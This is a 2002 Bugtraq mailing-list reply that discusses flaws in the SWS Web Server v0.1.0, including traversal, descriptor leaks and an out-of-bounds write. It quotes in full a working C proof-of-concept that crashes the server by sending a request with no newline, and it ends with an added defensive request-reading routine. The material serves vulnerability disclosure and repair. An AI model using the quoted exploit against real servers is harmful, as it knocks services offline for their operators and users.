Dear saman@hush.com,

I don't believe this is the largest problem of this "webserver"... There are a lot of others:

1. Directory traversal (../) (it never drops the root privileges it needs to bind to TCP/80).
2. It never closes the file descriptor for the 404 document, so it can be used to DoS the remote system completely by repeating a request to a nonexistent document.
3. It allows only 1 connection at a time and never times out.
4. If recv() fails it will overwrite 1 byte before the allocated buffer and repeat the previous query. If the first recv() fails it will try to do some action on uninitialized heap data.

One should be completely nuts to use it because there are too many bugs for 130 lines of code :)

--Monday, September 2, 2002, 10:04:23 PM, you wrote to bugtraq@securityfocus.org:

shc> /*
shc>  * Mon Sep 2 17:45:04 2002
shc>  *
shc>  * |SaMaN| aka Mert <saman@hush.com>
shc>  *
shc>  * Information : Anyone can kill SWS Web Server v0.1.0 remotely.
shc>  *
shc>  * Proof of Concept Exploit for SWS Web Server v0.1.0
shc>  *
shc>  * SWS homepage : http://www.linuxprogramlama.com
shc>  *
shc>  * Tested on : Slackware 8.1 - 2.4.18
shc>  *           : Redhat 7.0 - 2.2.16-22
shc>  *
shc>  * Problem : sws_web_server.c
shc>  *         : line 108
shc>  *         : if (recvBuffer[i - 1] != '\n') break;
shc>  *
shc>  * Q : So what will happen when we send a string not ending with '\n' ?
shc>  * A : break break break
shc>  * Q : So root should restart web server every time ?
shc>  * A : Yes
shc>  * Q : Other web servers act like this ?
shc>  * A : No
shc>  * Q : So something is wrong ?
shc>  * A : Yes :)
shc>  *
shc>  */
shc> #include <stdio.h>
shc> #include <stdlib.h>
shc> #include <unistd.h>
shc> #include <errno.h>
shc> #include <string.h>
shc> #include <netdb.h>
shc> #include <sys/types.h>
shc> #include <netinet/in.h>
shc> #include <sys/socket.h>
shc> 
shc> #define K  "\033[1;31m"
shc> #define Y  "\033[1;32m"
shc> #define SA "\033[1;33m"
shc> #define M  "\033[1;34m"
shc> #define PORT 80
shc> 
shc> int main(int argc, char *argv[])
shc> {
shc>     int sockfd, numbytes;
shc>     struct hostent *adres;
shc>     struct sockaddr_in hedef;
shc>     char buf[8] = "|SaMaN|";
shc> 
shc>     if (argc != 2) {
shc>         printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc>         printf("%sSWS Web Killer (saman@hush.com) \n", SA);
shc>         printf("%s=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n", K);
shc>         printf("%sUsage: ./sws_web_killer %s<IP> \n", Y, M);
shc>         return 0;
shc>     }
shc> 
shc>     if ((adres = gethostbyname(argv[1])) == NULL) {
shc>         perror("gethostbyname");
shc>         exit(1);
shc>     }
shc> 
shc>     if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
shc>         perror("socket");
shc>         exit(1);
shc>     }
shc> 
shc>     hedef.sin_family = AF_INET;
shc>     hedef.sin_port = htons(PORT);
shc>     hedef.sin_addr = *((struct in_addr *)adres->h_addr);
shc>     memset(&(hedef.sin_zero), '\0', 8);
shc> 
shc>     if (connect(sockfd, (struct sockaddr *)&hedef,
shc>                 sizeof(struct sockaddr)) == -1)
shc>     {
shc>         perror("connect");
shc>         exit(1);
shc>     }
shc> 
shc>     if ((numbytes = send(sockfd, buf, strlen(buf), 0)) == -1) {
shc>         perror("send");
shc>         exit(1);
shc>     }
shc> 
shc>     close(sockfd);
shc>     return 0;
shc> }

-- 
~/ZARAZA
Thus this route is cheaper, and it is easier to reach for anyone who is able to reach it. (Twain)
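The thread's complaints (a request without a trailing '\n' takes the server down, a failed recv() indexes one byte before the buffer, a silent client hangs it) all come from the same request-line loop. As an added illustration, not code from the original post or from SWS, here is how such a reader can handle those cases and let the server go on serving; the function name, return codes and the 5-second timeout are assumptions.

```c
/* Added example: read one request line from a connected socket without
 * the failure modes described in the thread.  Returns the line length
 * (>= 0) on success, REQ_EOF if the peer closed before sending '\n',
 * REQ_ERR on recv() error or timeout, REQ_TOOLONG if no '\n' fits. */
#include <errno.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>

enum { REQ_EOF = -1, REQ_ERR = -2, REQ_TOOLONG = -3 };

int read_request_line(int fd, char *buf, size_t cap)
{
    size_t len = 0;
    /* Do not wait forever for a silent client (assumed 5 s budget). */
    struct timeval tv = { 5, 0 };
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);

    while (len + 1 < cap) {            /* leave room for the final NUL */
        ssize_t n = recv(fd, buf + len, cap - 1 - len, 0);
        if (n < 0) {
            if (errno == EINTR) continue;
            return REQ_ERR;            /* checked before any buf[len-1] use */
        }
        if (n == 0)
            return REQ_EOF;            /* data without '\n', then close: reject it */
        len += (size_t)n;
        /* Search the whole accumulated buffer, so a request split across
         * several recv() calls is still recognised. */
        char *nl = memchr(buf, '\n', len);
        if (nl) {
            size_t line = (size_t)(nl - buf);
            if (line > 0 && buf[line - 1] == '\r') line--;   /* strip CR */
            buf[line] = '\0';
            return (int)line;
        }
    }
    buf[cap - 1] = '\0';
    return REQ_TOOLONG;                /* caller answers 414/400 and moves on */
}
```

Whatever the result, the caller closes that one connection and returns to accept(); none of the return codes is a reason to leave the serving loop.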